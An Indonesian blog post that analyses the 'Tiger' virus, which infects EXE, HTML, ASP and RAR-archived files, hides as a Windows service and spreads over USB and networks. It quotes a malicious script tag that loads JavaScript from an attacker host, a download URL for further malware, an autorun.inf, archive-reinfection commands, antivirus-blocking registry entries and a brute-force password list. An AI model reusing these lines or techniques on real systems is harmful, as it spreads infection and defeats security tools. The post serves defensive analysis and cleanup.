About Me

Sunday 8 January 2012

Virus Tiger Penginfeksi File Asp, Aspx, Exe, Htm, Html, dan Rar


Nama File: Setup.exe dan booter.exe
MD5: 09A1CB7D2FE6A3A3A90CF82914BCD1B6
CRC32: C4717989
Size: 243 KB


Virus ini marak beredar di RRC pada awal tahun 2010 yang sudah dekat dengan perayaan Imlek menyambut Tahun "Harimau". Atas dasar itulah virus ini dinamakan virus Tiger oleh mereka. Saya sendiri juga yakin asal virus ini memang berasal dari negara tersebut karena virus ini melakukan DNS Request ke www.baidu.com dan www.xunlei.com. Artikel-artikel yang membahas tentang virus ini belum ada yang berbahasa Inggris (demikian juga dengan bahasa Indonesia), yang ada hanyalah dalam bahasa Mandarin (pada saat saya mencoba search dari Google). Informasi di postingan ini juga merupakan pengalaman saya sewaktu bermain-main dengan virus ini ditambah dengan informasi dari artikel berbahasa mandarin tersebut (tentunya dibaca dengan Google Translate ).

Tetapi baru-baru ini saya mendapat sampel virus ini dari rekan ARRe di Forum Smadav (smadav.net) yang berarti virus ini sudah mulai menyebar di Indonesia. Inilah yang mendorong saya untuk menulis artikel ini dengan kemampuan pas-pasan..

Bentuk sampel ini didapat dari file aplikasi (Exe) yang telah terinfeksi oleh virus ini yang mana Smadav belum mendeteksinya sebagai virus. Mungkin ini bisa jadi pertimbangan untuk penambahan database Smadav maupun Anti Virus lain selanjutnya.
Tetapi Smadav mendeteksi file hasil tularannya di Flash Disk (Setup.exe) yang terdeteksi sebagai QVod.A oleh Smadav:


Lalu, apa istimewanya dari virus ini sehingga menarik untuk dibahas? Virus ini mengadopsi teknik Dewa Worm yaitu conficker dalam hal menyamar sebagai Service Windows dan menyebar melalui jaringan sehingga tidak terlihat prosesnya melalui Task Manager. Tetapi tidak seperti para pendahulunya (Virus Alman dan Conficker) yang menyamar sebagai Service yang baru, virus ini menyamar sebagai Service yang sama persis namanya dengan Service Windows yang sudah ada sehingga membuatnya sangat sulit untuk dilacak dan dibasmi.. 

Mirip dengan Ramnit dan Sality dalam hal menginfeksi file Exe, HTM, dan HTML ditambah lagi virus ini bisa menginfeksi file ASP, ASPX, dan file-file ASP, ASPX, Exe, HTM, dan HTML yang terkompres dalam bentuk RAR. Setahu saya, belum ada virus yang menginfeksi file di dalam bentuk RAR sebelum ini. Ditambah lagi virus ini bisa mengundang kumpulan virus lainnya melalui koneksi Internet. Teknik klasik juga dilakukannya seperti memblok beberapa Anti Virus Terkenal dan juga terhadap Website-website yang berhubungan dengan Security dan Anti Virus..

Walaupun sudah banyak Anti Virus yang bisa mendeteksi Virus ini, namun kita tetap harus waspada karena teknik yang digunakannya bisa lebih dikembangkan dalam dunia pervirusan terutama tekniknya dalam menginfeksi file-file di dalam kompresan RAR. 

Sewaktu virus Setup.exe pada Flash Disk ini dijalankan pada komputer yang sehat, maka dia akan memonitor dan mencari Service Windows diantara berikut ini (secara berurutan dari atas ke bawah) yang masih dalam keadaan off:


Target Service yang akan diinfeksi adalah Service yang masih dalam keadaan off untuk diinfeksi file Dll yang bersangkutan dengannya. Mengapa mengincar Service yang sedang off? Karena file dll pada Service yang sedang dalam keadaan ON akan selalu aktif di-load sehingga harus mematikan servicenya terlebih dahulu sebelum bisa diinfeksi file dll-nya. Semua Service ini dijalankan oleh svchost.exe (netsvcs).
Setelah menemukan target Service Windows yang akan diinfeksinya, Setup.exe mengganti (Overwrite, bukan menginfeksi) file dll yang bersangkutan dengan Service yang diincarnya (lokasinya di dalam C:\windows\system32).

File dll palsu dari virus ini selalu berukuran 243 KB.


File Dll yang Palsu Tidak Memiliki Tab "Version"

Setelah membuat file dll palsu, virus ini akan segera memerintahkan Services.exe untuk menjalankan service ini melalui svchost.exe (netsvcs).

Virus Telah Berhasil Membuat Appmgmts.dll Menumpang Pada Svchost.exe (netsvcs) dan Menyamar Sebagai Service "Application Management" Sehingga Sangat Sulit untuk Dilacak
Belajar dari virus Alman dan Conficker yang mudah di-kill dengan Services.msc, Setup.exe akan mencegahnya dengan menghapus key berikut pada Registry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[Nama Pendek]

Misalnya Service yang menjadi target adalah AppMgmt (Application Management), maka key yang dihapus adalah:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt

Tujuan menghapus key ini adalah agar korban tidak bisa menghentikan Service samaran dibuat oleh virus ini. Ketika korban mencoba melakukan klik ganda terhadap service ini melalui Run-->"Services.msc" (Tekan Enter), akan muncul pesan error:

Setup.exe juga membuat file DelInfo.bin pada C: untuk menyimpan informasi tentang lokasi Drive dan File di dalam komputer korban. Sampai di sini, peran Setup.exe telah selesai (exit). Setelah itu, service palsu inilah yang benar-benar berkuasa di komputer korban setelah dipicu oleh setup.exe tadi.

Aksi pertama yang dilakukan Service Dll palsu ini adalah membaca informasi pada C:\ DelInfo.bin (kemudian menghapusnya) dan membuat Service tersembunyi baru lainnya yang bernama "Forter", dengan membuat file Forter.sys pada C:\WINDOWS\TEMP dan Registry berikut ini:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Forter,
DisplayName = "Forter"
ErrorControl = 1
ImagePath = "\??\C:\WINDOWS\TEMP\Forter.sys"
Start = 3
Type = 1

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Forter\Security,
Security = {Deretan Angka HeksaDesimal}

Pada Value "Start" bernilai 2 (Manual) yang artinya Service Forter ini akan berjalan jika dipicu baik itu oleh virus maupun User yang dalam hal ini tentunya dipicu oleh Virus (2=Manual dan 4=Disabled).
Kemudian, Service Dll yang palsu tadi akan memerintahkan Services.exe untuk segera memulai Service "Forter" yang telah dibuatnya tadi dan kemudian dijalankan oleh svchost.exe (netsvcs).

Services.exe Mulai Membaca Key "Foster" Ini untuk Membaca Statusnya Sebelum Dijalankan

 Forter.sys Telah Dijalankan Oleh Svchost.exe (Netsvcs)
Forter.sys ini sendiri sudah banyak dideteksi sebagai Rootkit yang dijalankan dengan tujuan (menurut saya) menyebar ke jaringan (seperti membobol akun Admininstrator komputer korban dan menyebarkannya lewat jaringan yang akan diberi penjelasan setelah ini). Setelah Service Foster ini selesai menjalankan tugasnya, maka Foster.sys beserta Key pada HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Forter ini akan segera dihapus untuk menghilangkan jejaknya. Jadi, sangat sulit melacak berjalannya Service ini bahkan dengan Run-->"Service.msc" sekalipun. Walaupun sulit untuk melacak berjalannya Service Forter ini, tetap saja akan meninggalkan jejak pada Key Registry (setiap Service yang pernah dijalankan akan meninggalkan jejak ini):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER,
NextInstance = 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER\0000,
Class = "LegacyDriver"
ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
ConfigFlags = 0
DeviceDesc = "Forter"
Legacy = 1
Service = "Forter"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER\0000\Control,
ActiveService = Forter
*NewlyCreated* = 0

Sebagai catatan, varian virus Tiger pertama yang menyebar di RRC ini membuat file bernama Wowsub.sys pada C:\WINDOWS\TEMP  dan Service yang bernama "Wowsub", sedangkan varian yang saya dapatkan ini membuat file Forter.sys dan Service "Forter".

Varian yang Membuat File Forter.sys dan Service "Forter"
Varian yang Membuat File Wowsub.sys dan Service "Wowsub"
Lalu Service Dll ini akan mulai menginfeksi file-file ASP, ASPX, HTM, HTML, dan RAR di dalam setiap Drive termasuk Flash Disk. Tetapi virus ini masih berbaik hati karena tidak menginjeksi file-file aplikasi yang ada di dalam folder:
WinRAR
WindowsUpdate
Windows NT
Windows Media Player
Outlook Express
NetMeeting
MSN Gaming Zone
Movie Maker
microsoft frontpage
Messenger
Internet Explorer
InstallShield Installation Information
ComPlus Applications
Common Files
RECYCLER
System Volume Information
Documents and Settings
WinNT
WINDOWS


Pada file aplikasi (Exe) yang telah diinfeksi oleh virus ini, ternyata tidak mengalami pertambahan size (ukuran file) yang tetap.


Apabila aplikasi yang telah diinfeksi ini dijalankan, maka aplikasi ini akan berjalan sebagaimana biasanya ditambah dia akan membuat file sementara booter.exe dan DelInfo.bin pada C: dan akan menjalankan file booter.exe yang telah dibuat ini. Setelah dijalankan, booter.exe dan DelInfo.bin kemudian akan dihapus kembali, begitulah seterusnya jika ada aplikasi yang telah diinfeksi berjalan. Jadi, jika ada aplikasi terinfeksi di komputer yang berjalan otomatis setiap komputer korban dinyalakan, maka komputer akan terinfeksi kembali. Booter.exe dan Setup.exe ini memiliki kode MD5 yang sama sehingga bisa dikatakan sama persis tingkah lakunya. Hanya saja, file setup.exe ini beratribut Hidden dan System sedangkan booter.exe tidak demikian. Begitu juga Booter.exe akan segera dihapus ketika selesai menjalankan perannya, sedangkan Setup.exe tidak demikian. Perbedaan ini dikarenakan Setup.exe mengincar komputer lain yang sehat sehingga harus Hidden agar tidak kelihatan dan tidak dihapus setelah menjalankan korbannya agar bisa semakin banyak menginfeksi korban. 


Selain booter.exe, file sementara di C: ini juga mungkin menggunakan nama CONFIG.exe dan boottemp.exe yang bisa dilihat dari String file setup.exe, booter.exe, file Dll palsu maupun file Exe yang terinfeksi:


Ada beberapa file hasil infeksi yang masih bisa berjalan dan ada juga yang sama sekali tidak bisa berjalan dengan menampilkan pesan error sebagai berikut:


Terkadang juga menimbulkan proses error bahwa sistem Windows sedang bermasalah karena aksi infeksi tersebut:


Sementara ini banyak Anti Virus yang sudah mendeteksi file exe hasil infeksi ini sebagai virus. Tetapi belum banyak Anti Virus yang bisa menyembuhkan file Exe yang terinfeksi ini, kebanyakan langsung menghapusnya. Selain file aplikasi, virus ini juga menginfeksi file ASP, ASPX,  HTM, HTML dengan menambahkan script pada bagian footernya:

<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>

Dengan tujuan ketika user menjalankan Script ASP, ASPX,  HTM, HTML yang dibukanya, maka komputer korban akan ternfeksi karena Script tersebut akan menjalankan javascript tongji.js (ketika terhubung dengan internet).

Bagian Footer (Akhir) File HTML yang Telah Terinfeksi
Satu inovasi yang digunakan oleh virus ini adalah dia bisa menginfeksi file HTM, HTML, ASP, ASPX yang terkompres dalam bentuk rar (WinRAR archive). Untuk tujuan ini, virus menggunakan bantuan Rar.exe pada lokasi C:\Program Files\WinRAR untuk mengekstrak isi file rar target ke folder Temporary (C:\WINDOWS\TEMP) dengan Command berikut:

"[Lokasi Rar.exe]" X -ibck "[Lokasi File RAR Target]" "C:\WINDOWS\TEMP\"

Selanjutnya akan menginfeksi file HTM, HTML, ASP, ASPX yang telah diekstrak ke folder Temporary tadi dan terakhir akan menggunakan kembali Rar.exe untuk mengkompres kembali seluruh file ini ke dalam bentuk rar dengan nama yang sama dan mengganti file rar target dengan file rar yang telah dibuatnya tadi dengan Command berikut:

"[Lokasi Rar.exe]" M -ibck -r -o+ -ep1 "[Lokasi File RAR Target]" "C:\WINDOWS\TEMP\[Nama File RAR Target]\*"

Virus Sedang Memanggil Rar.exe untuk Mengekstrak File Rar Target ke Folder Temporary untuk Kemudian Diinfeksinya

Virus Sedang Memerintahkan Rar.exe untuk Mengkompres Kembali File-File yang Telah Diinfeksinya

Selanjutnya akan menginfeksi file HTM, HTML, ASP, ASPX yang telah diekstrak ke folder Temporary tadi dan terakhir akan mengkompres kembali seluruh file ini ke dalam bentuk rar dengan nama yang sama dan mengganti file rar target dengan file rar yang telah dibuatnya tadi.
Contoh: Jika virus ini mengincar Flash Defender.rar pada lokasi D:\Software, maka Commandnya akan berisi:

"C:\Program Files\WinRAR\Rar.exe" X -ibck "D:\Software\Flash Defender.rar" "C:\WINDOWS\TEMP\"

"C:\Program Files\WinRAR\Rar.exe" M -ibck -r -o+ -ep1 "D:\Software\Flash Defender.rar" "C:\WINDOWS\TEMP\Flash Fefender\*"

Flash Defender.exe yang Telah Diekstrak dan Diinfeksi Ini Kemudian Akan Dikompres Kembali
Tetapi untuk file-file kompres yang ber-password tidak akan terinfeksi. Untuk itu, biasakan dari sekarang untuk membuat password pada file yang dikompres terutama yang didalamnya berisi file-file yang penting. Cukup menerapkan password yang sama untuk semuanya sehingga mudah diingat. Virus ini menyebar pada flash disk dengan membuat file setup.exe di dalam folder recycle.{645FF040-5081-101B-9F08-00AA002F954E}dan juga file autorun.inf yang isi tulisan di dalamnya adalah sebagai berikut:
[autorun]
OPEN=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe
shell\open=´ò¿ª(&O)
shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe Show
shell\open\Default=1//
shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)
shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe Show


Yang mana fungsi autorun.inf ini adalah agar setup.exe dapat berjalan otomatis jika user membuka Flash Disk tersebut.


Aksi Pada Registry

Untuk mempertahankan dirinya, maka virus ini akan memblok safe mode (akan keluar Blue Screen of Death sewaktu mencoba masuk safe mode) dengan menghapus ket berikut ini:
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

Virus ini akan memblok beberapa Anti Virus luar dengan membuat key berikut ini:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

360hotfix.exe 360rp.exe
360rpt.exe 360safe.exe 360safebox.exe 360sd.exe
360se.exe 360SoftMgrSvc.exe 360speedld.exe 360tray.exe
ast.exe
avcenter.exe 
avgnt.exe
avguard.exe avmailc.exe
avp.exe 
avwebgrd.exe bdagent.exe CCenter.exe ccSvcHst.exe 
egui.exe
ekrn.exe
kavstart.exe kissvc.exe kmailmon.exe kpfw32.exe kpfwsvc.exe krnl360svc.exe kswebshield.exe KVMonXP.kxp KVSrvXP.exe kwatch.exe 
livesrv.exe Mcagent.exe mcmscsvc.exe McNASvc.exe Mcods.exe McProxy.exe McSACore.exe Mcshield.exe mcsysmon.exe mcvsshld.exe MpfSrv.exe MPMon.exe MPSVC.exe MPSVC1.exe MPSVC2.exe msksrver.exe qutmserv.exe RavMonD.exe RavTask.exe RsAgent.exe rsnetsvr.exe RsTray.exe safeboxTray.exe ScanFrm.exe sched.exe seccenter.exe SfCtlCom.exe TMBMSRV.exe TmProxy.exe UfSeAgnt.exe vsserv.exe zhudongfangyu.exe
修复工具.exe

Debugger = "ntsd -d"

Virus ini akan mengganti lokasi folder penampungan untuk Temporary Internet Files dengan mengubah value dari:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths, Directory dari "C:\Documents and Settings\[USER]\Local Settings\Temporary Internet Files\Content.IE5" menjadi "C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1, CachePath dari "C:\Documents and Settings\[USER]\Local Settings\Temporary Internet Files\Content.IE5\Cache1" menjadi "C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2, CachePath dari "C:\Documents and Settings\[USER]\Local Settings\Temporary Internet Files\Content.IE5\Cache2" menjadi "C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3, CachePath dari "C:\Documents and Settings\ [USER]\Local Settings\Temporary Internet Files\Content.IE5\Cache3" menjadi "C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4, CachePath dari "C:\Documents and Settings\ [USER]\Local Settings\Temporary Internet Files\Content.IE5\Cache4" menjadi "C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

Tujuan mengganti lokasi folder Temporary Internet Files ini mungkin agar file-file jahat di dalamnya dari hasil koneksi Internet sulit dilacak dan dihapus oleh korban. Selain itu, virus ini juga mengganti lokasi folder penampungan informasi Favorites Toolbar pada Internet Explorer dari C:\Documents and Settings\[USER]\Favorites menjadi C:\Documents and Settings\NetworkService\Favorites dengan membuat folder baru bernama Favorites pada C:\Documents and Settings\NetworkService lengkap beserta file desktop.ini didalam folder ini yang isinya sama persis dengan yang asli.

Serta juga mengganti Value Favorites dari  "C:\Documents and Settings\[USER]\Favorites" menjadi  "C:\Documents and Settings\NetworkService\Favorites" dari kedua key berikut ini:

HKEY_USERS\S-1-5-21-1606980848-1647877149-2146704303-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Favorites Toolbar Pada Internet Explorer
Lokasi Folder Tempat Penyimpanan Informasi Favourites Toolbar Sebelum Diganti Virus
Catatan: Lokasi folder pada Windows XP dan Windows sedikit berbeda yang mengakibatkan Value Registry yang sdikit berbeda pula dengan rincian:

C:\Documents and Settings\[USER]\Local Settings\Temporary Internet Files (XP) = C:\Users\[USER]\AppData\Local\Microsoft\Windows\Temporary Internet Files (7)

C:\Documents and Settings\[USER]\Favorites (XP) = C:\windows\ServiceProfiles\NetworkService\Favorites (7)

C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files (XP) = C:\windows\ServiceProfiles\NetworkService\AppData\ Local\Temp\Temporary Internet Files (7)

Selanjutnya Registry berikut ini juga akan dihapus:
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
- HKEY_USERS\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXX-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX

Aksi Pada Jaringan

Melakukan blok ke website berikut dengan memodifikasi file C:\windows\drivers\etc\hosts

duba.net
rising.com.cn
360safe.com
eset.com.cn
jiangmin.com
antivir-pe.com
antivir-pe.de
symantecliveupdate.com
nai.com
micropoint.com.cn
kaspersky.com
kafan.cn
366tian.net
ikaka.com
vc52.cn
aikaba.com
janmeng.com
360.cn
bitdefender.com
symantec.com
sky.net.cn
norman.com
sunbelt-software.com
ahn.com.cn
drweb.com.cn
free-av.com.avast.com

Untuk memastikan komputer korban terhubung dengan internet, virus ini melakukan aksi ping terhadap:
www.baidu.com
www.xunlei.com

Jika proses ping sukses (yang menandakan bahwa komputer korban terhubung dengan internet), selanjutnya virus ini akan mendownload sekumpulan Malware lainnya dari alamat yang telah ditentukan (http://208.53.151.219:8080/down/XXX.exe) di komputer korban.

Trafik DNS lainnya:

a.nba1001.com
b.nba1001.com
c.nba1001.com
d.nba1001.com
e.nba1001.com
f.nba1001.com
g.nba1001.com
h.nba1001.com
i.nba1001.com
j.nba1001.com

up.nba1001.com
up1.nba1001.com
up2.nba1001.com
up3.nba1001.com
up4.nba1001.com
up5.nba1001.com
up6.nba1001.com
up7.nba1001.com
up9.nba1001.com
router.bitcomet.net
router.bitcomet.com
router.utorrent.com
UserTrust.com
ns6.staminus.net
www.co.sandai.net

www.3-0B6F-415d-B5C7-832F0.com

Memerintahkan Internet Explorer untuk mengakses http://tj.nba1001.net:7777/tj/mac.html dengan Command Line:
"C:\Program Files\Internet Explorer\iexplore.exe" http://tj.nba1001.net:7777/tj/mac.html




Virus ini juga menyebar melalui jaringan dan komputer lain (kemungkinan dilakukan dengan Service Forter) yang terhubung dengannya juga ikut terinfeksi. Untuk itu, Virus ini berusaha mengambil akun administrator komputer korban dengan kombinasi password:

Administrator
Guest
admin
Root
password
6969
harley
123 456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
12345678
12345
ccc
admin
5201314
qq520
1
12
123
1234567
123 456 789
654321
54321
111
000000
abc
pw
11111111
88888888
pass
passwd
database
abcd
abc123
pass
sybase
123qwe
server
computer
520
super
123asd
0
ihavenopass
godblessyou
enable
xp
2002
2003
2600
alpha
110
111111
121 212
123 123
1234qwer
123abc
007
a
aaa
patrick
pat
administrator
root
xxx
god
xxxyou
xxx
abc
test
test123
temp
temp123
win
pc
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100 

Setelah berhasil membobol akun ADM komputer korban maka virus ini akan membuat replika CONFIG.exe (dengan MD5 yang persis sama dengan setup.exe maupun booter.exe) pada Direktori yang di-Share secara full dan mengirimkan perintah kepada komputer yang terhubung dengannya agar komputer sehat tersebut menjalankan CONFIG.exe ini sehingga komputer sehat ini bisa terinfeksi.

Kesimpulan:
- Virus menyamar sebagai Service Windows yang dilakukan dengan mengganti file Dll.
- Menginfeksi file ASP, ASPX, HTM, HTML, dan keempat file tersebut di dalam file RAR.
- Menyebar lewat Removable Disk dan jaringan.
- Menggunakan Rar.exe dan Iexplore.exe dalam melancarkan aksinya.

Pembersihan: http://herman-salim.blogspot.com/2012/01/pembersihan-virus-tiger.html

Maaf jika ada hasil analisis yang bertentangan dengan yang seharusnya karena kemampuan saya masih hitungan pas-pasan. Mohon diberikan kritik dan sarannya dengan meninggalkan komentar di bawah. Jika berkenan, sebarkan artikel ini agar teman-teman bisa mewaspadainya. Dengan ini, kita berharap agar virus ini dan yang setipe dengannya bisa dicegah secepatnya tanpa sempat menyebar luas di Indonesia.
Mohon tinggalkan email anda berupa komentar di postingan ini dan saya akan kirim secepatnya.

0 komentar:

Post a Comment